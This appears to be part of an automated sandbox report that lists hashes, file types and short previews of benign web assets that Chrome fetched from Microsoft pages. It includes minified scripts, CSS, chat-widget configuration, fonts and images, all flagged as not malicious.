                                                                                                                                                              SHA-256:0625AEA907B132E21DDA7CFE12C3AFFE07EAA45E9900CB5BDB602469F89C2E0D
                                                                                                                                                              SHA-512:67A44963E43EADFA3BD6ECAAF8342F91ED0F803C28AFF204EE835F32F100D741755DC3793628CF0D087AD3241A6D6C4834E02B9AD92B6E7392CF8E2F73AA474D
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:/*. OneCloud Reimagine v0.309.0. MWF (Moray) v2.8.1. Copyright (c) Microsoft Corporation. All rights reserved.. Copyright 2011-2020 The Bootstrap Authors and Twitter, Inc..*/.'use strict';(function(V,L){"object"===typeof exports&&"undefined"!==typeof module?L(exports):"function"===typeof define&&define.amd?define(["exports"],L):(V="undefined"!==typeof globalThis?globalThis:V||self,L(V.ocrReimagine={}))})(this,function(V){function L(){function b(x,w,y){return Object.defineProperty(x,w,{value:y,enumerable:!0,configurable:!0,writable:!0}),x[w]}function d(x,w,y,R){w=Object.create((w&&w.prototype instanceof c?w:c).prototype);R=new r(R||[]);return A(w,"_invoke",{value:k(x,y,.R)}),w}function a(x,w,y){try{return{type:"normal",arg:x.call(w,y)}}catch(R){return{type:"throw",arg:R}}}function c(){}function e(){}function f(){}function g(x){["next","throw","return"].forEach(function(w){b(x,w,function(y){return this._invoke(w,y)})})}function h(x,w){function y(E,wa,ja,Lb){E=a(x[E],x,wa);if("throw"!==E.
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (3164)
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):34401
                                                                                                                                                              Entropy (8bit):5.567515913811421
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:5EE9E4E4E0A5FD39092E63D2D102B12B
                                                                                                                                                              SHA1:1B66C81BD03006B327228854327C0FD3DF434BC2
                                                                                                                                                              SHA-256:441B9F212CD322C6B039A2691F999EB2FAFC10FD645BCDB043A6DEE2DD052DA7
                                                                                                                                                              SHA-512:3CA07A5D89931BCF6F0294C0727020A7FFE663487DB6ECC309FF69DDF59A0490BF85395E91241D40ED1DCF157C0784E6D6B53D8C92D52ED05823CCB6FBE1C470
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:'use strict';(()=>{function L(n){var r=T[n];if(void 0!==r)return r.exports;r=T[n]={exports:{}};return U[n](r,r.exports,L),r.exports}var U={3770:(n,r,h)=>{n.exports=h(2494).default},2494:(n,r,h)=>{function f(x){return!x.response&&!!x.code&&"ECONNABORTED"!==x.code&&(0,a.default)(x)}function g(x){return"ECONNABORTED"!==x.code&&(!x.response||500<=x.response.status&&599>=x.response.status)}function p(x){return!!x.config&&g(x)&&-1!==t.indexOf(x.config.method)}function m(x){return f(x)||p(x)}function k(){return 0}.function l(x){var H=x[A]||{};return H.retryCount=H.retryCount||0,x[A]=H,H}function u(x,H){x.interceptors.request.use(function(E){return l(E).lastRequestTime=Date.now(),E});x.interceptors.response.use(null,function(E){var v=E.config;if(!v)return Promise.reject(E);var I=Object.assign({},H,v[A]),P=I.retries;P=void 0===P?3:P;var J=I.retryCondition;J=void 0===J?m:J;var M=I.retryDelay;M=void 0===M?k:M;I=I.shouldResetTimeout;I=void 0!==I&&I;var Q=l(v);if(J(E)&&Q.retryCount<P){Q.retryCount+
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1
                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:1
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):6016
                                                                                                                                                              Entropy (8bit):7.9278451274294195
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:F1866D5473CE8C4DCEA56088B8710733
                                                                                                                                                              SHA1:A4BEADEEE35CE3FB580D8864076D65160FA0F84A
                                                                                                                                                              SHA-256:00B4A7BADFFB0B73C7EC5BF892C22D373630AD869557254C011BA34C72465487
                                                                                                                                                              SHA-512:FE98F206B8AF9BBD9CCC96579DCA710C1129CFBF6EEC73702884166204957CCBB3DA50DB2957BEB5A8EE49CF19B1DCDF85751ADD938C59BAE1CC41C7C5E23D90
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Use-Cases-BG?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=2000&qlt=99&fit=constrain"
                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D................f...(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma..................nmdat.....*~.C.....2.,D...A.@.Y.TM]Cc..@.:p.....R..F6.W..k..cg8....K..G...i..%Z..FhO...P....C. B...V.*.f.............Q....._....<.H...n....D.r.kb.U..~..3..`]u...T.....@/..1...zb3.E..<....b......k\...7....$9,.....*Z!5....E[].....%...c.>..c..5..C=[. <......5....h...v.,...J0.l'^.D..^.$.3[....L..........uC...A9...+.~._}..!.....B.S..P....=S%.E.b ..:..C%.....N....E/u.....R.......?s`....c.bt.r.z.f.EkC..+YWm..NFW=.=.].YE.W.....r.!.R...7........7.....&..s.Q..8.b..........`]..CS}}..S...o.)......a.K.g...*`..g..D..\.{.@H....s3H+;.utN....S.y.9.\X..OZ,.T...4yI.K.aK..C\.y;.PFPE..9.f..^...q.R+/?.%........)!(. D./..g.).......!.....^I......JarD-l.9.E..Y....'.`c..hs*.....B-_..|.".G.g....e......u..8
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):132218
                                                                                                                                                              Entropy (8bit):7.996481580060402
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:1BD7E341B27AD16336BC64C4BDB79F5C
                                                                                                                                                              SHA1:E39806B65F8967483F8DD5992CA4CB1BA3C16480
                                                                                                                                                              SHA-256:08BA77DE52C9F16517EFB7BEF8C03CA80352A82B90645112A3EDCF3127C78CF1
                                                                                                                                                              SHA-512:AF09F1591BE635AED4ACC81270677381D2A30218511D110BE455ECE2A41714B86B2F97300BF9B823FE4ED56E6828025BC5F055F25EC6CBC21B0F82A73D7274EC
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:RIFFr...WEBPVP8X...........%..ALPHg.....p....@.m3..O......................................................................................."..VP8 ....0m...*..&.>...A..Jy...Q,..|o....^.......m.....wi..c..1.......K..s....#...../.{..<|?...?........?....../.......g..........#.....?..........w.......>..[.5.O.....'.o................_.?.|....[.?.O..............o............?.................._...h...........g.k...........?...}......d.+.g..................S.g..........3.....w.o./...?.?z.............o./..E..?..............?....2..........+...5.....W.?....?x....../..?y~G......?..Q...C......$.....?...........3.../.....e.K..._.g.....u...o.?...>../.'.....?..Z.....o......[........?....[.o...?..._...?..^...O._....2}R>..G.g.....`?...T...+......................?......7.?.....z........................W./........=~..Q..~t~....8.v1.!..y..c.C........S}....QHX...>..R.z"]..s...Gd.J.t..y..\.!(,z..-.D.:.JMA.1.*.....]....._.m.y..#.wc...0G.....E~...M..~...SMN...P.[.F....L..1..+T..Y
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (2508), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2508
                                                                                                                                                              Entropy (8bit):5.579840840147867
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:BD0F39DE12202F85F0303DBD6DE2304E
                                                                                                                                                              SHA1:7E91492DBD8D4EAB8F3F72330542DD0121474FCC
                                                                                                                                                              SHA-256:CA86189E4C285A0DE3DB96C9F6C1496305CF312670C777E987CDECCCD1CFE90A
                                                                                                                                                              SHA-512:98504042F4494EFD16CA47A61DEE7B416A9A3442634FBBF59800B06D551DAADE720E3F339CA26B663CCF047316B7C35532E771AD78EBE07F6915D606083E2790
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:lp4281701038({"onsiteLocations":[4273302638],"followMeTime":0,"connectorId":1644210230,"renderingType":1,"channel":1,"allowUnauthMsg":true,"windowConf":{"json":{"externalConfiguration":null},"type":"internal"},"description":"","language":"en-US","source":0,"type":5,"enabled":true,"skillName":"BOT-POWER-GREETER-EN-US","isUnifiedWindow":true,"id":4281701038,"isPopOut":false,"timeInQueue":0,"visitorBehaviors":[138786914],"followMePages":1,"availabilityPolicyForMessaging":1,"campaignId":"4281700938","zones":[1832737930],"windowId":4281708938,"conversationType":1,"skillId":4273314838,"useSystemRouting":false,"effects":{"useLightBox":false,"secondsToCollapseAfter":0},"createdDate":"2023-11-08 09:55:46","connector":{"deleted":false,"configuration":{"acrValues":["0"],"pkceEnabled":false,"clientId":"60270350","jsMethodName":"lpTag.taglets.unAuthMessaging.lpUnauthFunction","jsContext":"lpTag.taglets.unAuthMessaging","jwtPublicKey":"MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvGQctwBFFZBaSu+LC4LV
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (48479)
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):48549
                                                                                                                                                              Entropy (8bit):5.75044071066438
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:95493A49BF17EDAC63C5C47DBFA17099
                                                                                                                                                              SHA1:9167CAB1B25D6F696D5EB55EA996ABCC1AC6C106
                                                                                                                                                              SHA-256:B64EE957C9A9BCFCC69EEE30697AD48ED175BA345B0C15A41A1CEE0C848365DC
                                                                                                                                                              SHA-512:F22C5CD2FEBD8CCAC48E9E84C1C8B5C148DFB49B337D9C31722962EB2A9E07456476D2DAE8117182453E930AB48BC5E7BB05BB377A69CE64B62B254BC5C6BBDB
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://static.canva.com/web/lrxlcv.46e04ebf85ef2440.ltr.css
                                                                                                                                                              Preview:.theme{color-scheme:var(--4h-m_A)}.light{--4h-m_A:light;--Zpa-KA:#00c4cc;--eGVbng:#8b3dff;--M5_pvA:#7731d8;--boKKWg:#612dae;--oqurdw:rgba(64,87,109,.07);--d1p99w:#fff;--17LfHw:rgba(36,49,61,.4);--EgWgfg:rgba(13,18,22,0);--X3--Zg:rgba(64,87,109,.07);--xfy86Q:rgba(57,76,96,.15);--p53f_Q:rgba(13,18,22,0);--REcY5g:#0d1216;--XajtPQ:rgba(36,49,61,.4);--FVk7Ew:rgba(165,112,255,.15);--2-zmYA:rgba(165,112,255,.15);--ySYdsQ:rgba(165,112,255,.2);--aMXh3A:rgba(64,87,109,.07);--_RN1Dg:#612dae;--8fGzbw:rgba(36,49,61,.4);--ob8tTA:rgba(13,18,22,0);--MghLXQ:rgba(64,87,109,.07);--3R4u8w:rgba(57,76,96,.15);--TwiLcg:rgba(13,18,22,0);--QeQ0Dw:#0d1216;--TZOI7A:rgba(36,49,61,.4);--SZMkXA:rgba(165,112,255,.15);--1zesEA:rgba(165,112,255,.15);--AMxRgw:rgba(165,112,255,.2);--BZ60Jw:rgba(64,87,109,.07);--8Ex5gA:#612dae;--spIP2A:rgba(36,49,61,.4);--KtXlRg:rgba(17,23,29,.6);--QADODw:rgba(13,18,22,.7);--kTBxcw:rgba(13,18,22,.86);--HxK_kw:rgba(17,23,29,.6);--6u-yJQ:#fff;--J0YKvA:hsla(0,0%,100%,.7);--yrvb-A:rgba(57,76
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (2842)
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):2989
                                                                                                                                                              Entropy (8bit):5.31391561142227
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:4074D0FAD329FF48B282891E1EB77CA3
                                                                                                                                                              SHA1:7E86BEF1B7CD06884EFDADE77FF14A31E376ECC4
                                                                                                                                                              SHA-256:FD12B52AC3D14978391818E3C3811513EA1045A3CED98855998747B9B8F349EA
                                                                                                                                                              SHA-512:462E8F036CC0297C4FD549BB22C18A1C2B4CE3341190449205F9BDBCA3D73AA1665F61262524C39C3674FBF2974972CE5973E86003BA7E6A8106371F8584B848
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://assets.adobedtm.com/5ef092d1efb5/2537c33769cb/0c4dbba778f5/RC1fc64c69f66543f7902881d9fba93b30-source.min.js
                                                                                                                                                              Preview:// For license information, see `https://assets.adobedtm.com/5ef092d1efb5/2537c33769cb/0c4dbba778f5/RC1fc64c69f66543f7902881d9fba93b30-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/2537c33769cb/0c4dbba778f5/RC1fc64c69f66543f7902881d9fba93b30-source.min.js', "!function(){for(var w=[[/\\w{2}-?(?:\\w{2}|\\w{4}-\\w{2})?\\/(?:microsoft-cloud)\\/?.*/gi,\"8rugvc69mo\"],[/\\w{2}-?(?:\\w{2}|\\w{4}-\\w{2})?\\/(?:microsoft-teams)\\/?.*/gi,\"8j6z5n8me5\"],[/\\w{2}-?(?:\\w{2}|\\w{4}-\\w{2})?\\/(?:microsoft-365)\\/?.*/gi,\"8qumfcbe49\"],[/\\w{2}-?(?:\\w{2}|\\w{4}-\\w{2})?\\/(?:windows-365)\\/?.*/gi,\"8j705rlc54\"],[/\\w{2}-?(?:\\w{2}|\\w{4}-\\w{2})?\\/(?:microsoft-viva)\\/?.*/gi,\"8j70e2bszm\"],[/\\w{2}-?(?:\\w{2}|\\w{4}-\\w{2})?\\/(?:security)\\/?.*/gi,\"8j70lgy2cr\"],[/\\w{2}-?(?:\\w{2}|\\w{4}-\\w{2})?\\/(?:trust-center)\\/?.*/gi,\"8j70lgy2cr\"],[/\\w{2}-?(?:\\w{2}|\\w{4}-\\w{2})?\\/(?:industry)\\/?.*/gi,\"8j70sts7ed\"],[/\\w{2}-?(?:\\w{2}|\\w{4}-\\w{2})?\\/(?:f
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (605)
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):179808
                                                                                                                                                              Entropy (8bit):5.556656445593751
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:C3AEC3D03BC5447975E3EE25B53F6C32
                                                                                                                                                              SHA1:353F68C0F6DF93888427E40135CF2DBF517F6FD0
                                                                                                                                                              SHA-256:72FBAC0EA8A0FF74E7ABE2E24FB992885AC904A3C1C579387E97654DD9C535BA
                                                                                                                                                              SHA-512:7D0E3CE67B84B7C1BBFC4511623426D68DE11D90BBEFF026013424C17D810CB59C75CD0754DD3A8AD9D3E27ED9620C9A6B92E2D7188C03845B0C3CC0E72951A1
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:'use strict';(()=>{function kc(a){a=!1===(a=void 0===a?!0:a)?null:gg;return a||((a=(a=(a="undefined"!==typeof globalThis?globalThis:a)||"undefined"===typeof self?a:self)||"undefined"===typeof window?a:window)||"undefined"===typeof Sc.g||(a=Sc.g),gg=a),a}function se(a){function b(){}var c;if(hg)a=hg(a);else if(null==a)a={};else{if("object"!==(c=typeof a)&&c!==yc)throw new TypeError("Object prototype may only be an Object:"+a);a=(b.prototype=a,new b)}return a}function Sa(a,b){function c(){this.constructor=.a}if(typeof b!==yc&&null!==b)throw new TypeError("Class extends value "+String(b)+" is not a constructor or null");ig(a,b);a.prototype=null===b?se(b):(c.prototype=b.prototype,new c)}function jg(a,b){for(var c=0,d=b.length,e=a.length;c<d;c++,e++)a[e]=b[c];return a}function Gb(a,b){return a&&ud.prototype.hasOwnProperty.call(a,b)}function vd(a){return a&&(a===ud.prototype||a===Array.prototype)}function te(a){return vd(a)||a===Function.prototype}function lc(a){if(a){if(Tc)return Tc(a);var
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):4488
                                                                                                                                                              Entropy (8bit):7.89532602480277
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:BC2514550A7FF0F5A460B7B26947D3F6
                                                                                                                                                              SHA1:40BF03FA8485475A25AD59B01C7C29E2BDB95F51
                                                                                                                                                              SHA-256:89609F82D6181F230251FF98335CFBF87A3EA265F94563783C67B958A9713999
                                                                                                                                                              SHA-512:C98885230DAACC8CCF00239C3BEE66541331D78C3D39869616E2345BC705B419E96090C4623887219685D90B5730B3E3822717648EB23AAF1D80649A8C966FA0
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Social_Media_Logo_X?scl=1
                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D................n...(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma..................vmdat........h...B2. ....T#......Idp.<.6.-..,.......A.T...<..t...G.s.A.....\...\.;...?..q.....ei .....6.K..f+..;.\..........$C..kl.T|.3/..9.9...$..=.~.-R%...d.;......,....h...7.....X2..(..2..0...D1$.G.(.....L....:[...B.U.HM.7.[4"..jA.@...^.N.O>.a..J.r.Z..^d...;sx.....GR<.Y/..F2..1_..lFRS.T...^0O.."...x..$.N..}.Z..)...n't*7..p..K.g.p....p.W_..$F^-.<...hiD.`...$#S.k..J .!.+.f..0...).......\...........K..K.W\U..E.E.".A.P......b.P......{.......[..L..~.......5..`......Z..]...4..*.<...T&.......eV..~>"l...~.W.].b.stw...}....1Mi2WbG.M.v...t...P..C&&...&z./..O.......}w..0.m..G....F$.0.....Y.=N...Yi..j8^Z.s....c....W....{....`K4.)...M........d.T.3>+....ys >.p..0.-.._.].2/..k.I.0. .>9hV...
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:Web Open Font Format, TrueType, length 26288, version 0.0
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):26288
                                                                                                                                                              Entropy (8bit):7.984195877171481
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:D0263DC03BE4C393A90BDA733C57D6DB
                                                                                                                                                              SHA1:8A032B6DEAB53A33234C735133B48518F8643B92
                                                                                                                                                              SHA-256:22B4DF5C33045B645CAFA45B04685F4752E471A2E933BFF5BF14324D87DEEE12
                                                                                                                                                              SHA-512:9511BEF269AE0797ADDF4CD6F2FEC4AD0C4A4E06B3E5BF6138C7678A203022AC4818C7D446D154594504C947DA3061030E82472D2708149C0709B1A070FDD0E3
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://www.microsoft.com/mwf/_h/v3.54/mwf.app/fonts/mwfmdl2-v3.54.woff
                                                                                                                                                              Preview:wOFF......f........D........................OS/2...X...H...`JM.FVDMX.............^.qcmap.............*.9cvt ...4... ...*....fpgm...T.......Y...gasp...D............glyf...P..U5.......head..]....2...6...Chhea..]........$$...hmtx..]..........ye'loca..^............Gmaxp..`.... ... ./..name..`....8....]..Rpost..f........ .Q.wprep..f$........x...x.c`.Pf......:....Q.B3_dHc..`e.bdb... .`@..`......./9.|...V...)00...-.Wx...S......._..m.m.m.m.m;e..y.~.......<p..a.0t.&...a.pa.0B.1..F...Q.ha.0F.3.....q.xa.0A.0L.&...I.da.0E.2L....i.ta.0C.1..f...Y.la.0G.3.....y.|a..@X0,.....E.ba.DX2,....e.ra..BX1..V...U.ja..FX3.....u.za..A.0l.6...M.fa.E.2l....m.va..C.1..v...].na..G.3......}.~a.p@80......C.a..pD82.....c.q..pB81..N...S.i..pF83.....s.y..pA.0\.....K.e..pE.2\....k.u..pC.1..n...[.m..pG.3......{.}...@x0<.....G.c...Dx2<....g.s...Bx1..^...W.k...Fx3.....w.{...A.0|.>...O.g...E.2|....o.w...C.1..~..._.o..08........?..0$........x...mL.U.............9.x.`[...&BF@X...V.h.Z..h......`n....[..U
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):187890
                                                                                                                                                              Entropy (8bit):7.99875967912678
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:B1CBC1870B05AF74D67E7FC915376549
                                                                                                                                                              SHA1:8E52E894C0F1EC082858859547387B348FE60F42
                                                                                                                                                              SHA-256:3BDC5F75105FCC9AA0984F887852E6DF37998AB8CB6863E412390CD052814F34
                                                                                                                                                              SHA-512:1D19E729EE492BAD6510C6E17DDA92334E22C8F9BF4ACD5C5689A079E0CBBAB0AD961ED953E648E2A4310C99422AFA0E15B948FC6A505E838DDFA5C8FB4DE0DF
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/ProductOverview_PBIinFabric_4.1?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=2000&qlt=95&fmt=png-alpha&fit=constrain"
                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D................].................Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe................pixi............av1C........colrnclx...........pixi..........av1C.......8auxC....urn:mpeg:mpegB:cicp:systems:auxiliary:alpha.....ipma.........................Emdat.....*.|..P2.....$P...y...6...F_\9%..'..%n...3........3..4...I...dA.H(.<..>|F.;.yZ....C..N.ZA|.....0[..hi.M...5f.S.:..uB_<.z].e1...`y...X.W...%...[...).E....._...^...9....X.[.....v..%m$.O 0.0.!.V...*.....b..}...........*.|.....B2..D.......V..H$na.P".3(-..S..p.0.=+%.5..WU.z..d.l}~.Y$,..d.y.K.e...X.._.r.G.p.0..&.1..5.../..C../(F.....$..a.u;.BXv*....h.........().....<.......l{....m^L..DxF..H@.=.X.:.e......Isj..Fz.[g......Sa?..m..lN)=&.J%x.....0KN.@~....o...Mz..:.'.].F.."*. .N...zl..`N.g...I" ...b:.d.W...JT.'......&.:'.......;|I.|j...
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (6982), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):6982
                                                                                                                                                              Entropy (8bit):4.890639313885154
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:F1EB7E4EA36185A91C404F6105FC4A27
                                                                                                                                                              SHA1:95A8C61028B5777D56F693C64902A98F200FE394
                                                                                                                                                              SHA-256:5930BE8B563A637E5C98C385974998B1246380DEF9948E538EAA6B630ECF99D2
                                                                                                                                                              SHA-512:32BB88B386C97D03098CB25E8CF36EE13F884EDF86FA72F7F1893F67DD41337C8DCB99F692BD3EEF6A6CF9751C6CA2F88F6DDAE36C9CF35E9D1F0A0A63E2625F
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:accountSettingsCB([{"id":"messaging.ios.sdk.min.version","createdDate":"2017-01-10 04:11:41","modifiedDate":"2023-01-22 16:38:10","type":2,"propertyValue":{"value":"1.1.36"},"deleted":false},{"id":"nbc.integrations.adobe.analytics","createdDate":"2021-07-07 07:29:31","type":2,"propertyValue":{"value":"false"},"deleted":false},{"id":"messaging.audio.sharing.enabled","createdDate":"2018-05-13 02:02:09","modifiedDate":"2018-11-14 08:32:03","type":2,"propertyValue":{"value":"false"},"deleted":false},{"id":"messaging.ios.logs.settings","createdDate":"2017-01-10 04:11:41","modifiedDate":"2023-01-22 16:38:10","type":4,"propertyValue":{"value":{"level":"WARNING","minLogLevel":"INFO","randomFactor":1000.0,"maxEvents":50.0,"maxPendingEventsRequests":10.0}},"deleted":false},{"id":"le.site.otk.forceDurationOverride","createdDate":"2021-06-29 03:18:17","type":2,"propertyValue":{"value":"false"},"deleted":false},{"id":"messaging.file.sharing.blurAllConversationImages","createdDate":"2021-04-13 05:58
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 150x150, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):4288
                                                                                                                                                              Entropy (8bit):7.956294742640289
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:01D1E1E0EE687E121C32709295270EC2
                                                                                                                                                              SHA1:AEEF213A9F99221435BE03FDED5BBD510AC0B051
                                                                                                                                                              SHA-256:2A5F56CE4EEC14EB9211ABCF120C59D1D3C25E2834139A7198DB57A189A431FE
                                                                                                                                                              SHA-512:0D2ED814DCDA0C6EA7F87A11CF17F2F6DFB0BBE07448356F19A28D88B39FACAA59A5ECF7649C845A968BA31E49F784B33EAF9A9B6978A561D955EC4AF6B7F10D
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/oc_chat_face_global
                                                                                                                                                              Preview:RIFF....WEBPVP8 .....G...*....>Q .D#.!..m.8....f...*P........0.m.%.......N...|.[...7;=....h...:...X....}u.+...'.5=.`.cp.T...h.....5.nj@.{B.Fo2....._nY.4..kY..|..y9.o.8....'...4^.O.....w.X.o........x#M...;..Vv...R..$...r.)....r.7l?.V.bo.9..Z.g..X........1.'...j.e].........&.|..A..y.5H..1.....e(;5.e..U...Y#.......QC.c.....o..F.zo..A...GE.!qB)...l..[.Ux9........sEe..../....f_.A...B..>.i..........\.)l.cN.}.N..*..<<r...h....Y.... e....=..c..D y.VG..........f.9.B_..R}..a..&.....Dg.....@..K...&....{..:..C+.....O.NV.2..|..tchX.$.. ....Ks...+...s.R.dU.e.-T.oL3.....x..<..{j...Zn.G.&.TI`....!.wD.N.v\.B._C.:.....X.4....x......s....m..!...qn.. .....Rf...+.z...v..P..,....UU,%...t}....$X.*.;....}D.N...h..._...Fz..o......d..|-....=..`"..........lx....0.n..|Y...x.....t..:...&..).i.=.L......P$..p~......Z.......F.."..\C..T...0.a;$..)...T...[.W/.N..S........~.=....i..d1.X.x..s<..+Xj../7("^..Y.l.W;..y[0.....}.j..x..4z.7.]..$I...#.wt.`j.
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):37471
                                                                                                                                                              Entropy (8bit):7.993605703261553
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:5FCB4379335094AA528BA172F7CB443D
                                                                                                                                                              SHA1:CE8660B5C220296DB0CE419EF40C082BCF3630D0
                                                                                                                                                              SHA-256:C3FA3125BFCC14F19615F4A39C7D4D97A90EF06DD5A41BF1BEB405B7B34C8E3E
                                                                                                                                                              SHA-512:18F8CABBB015CA6D3EC54C32C273EC06D5E8634DD3035FE8B67A6049A3B6CC5A20778C747699D06E63ABBB282A72C86643D6DBB1EDDA0B5132095A75808F8FDB
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/ProductOverview_PBIPro_5.3?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=2000&qlt=95&fit=constrain"
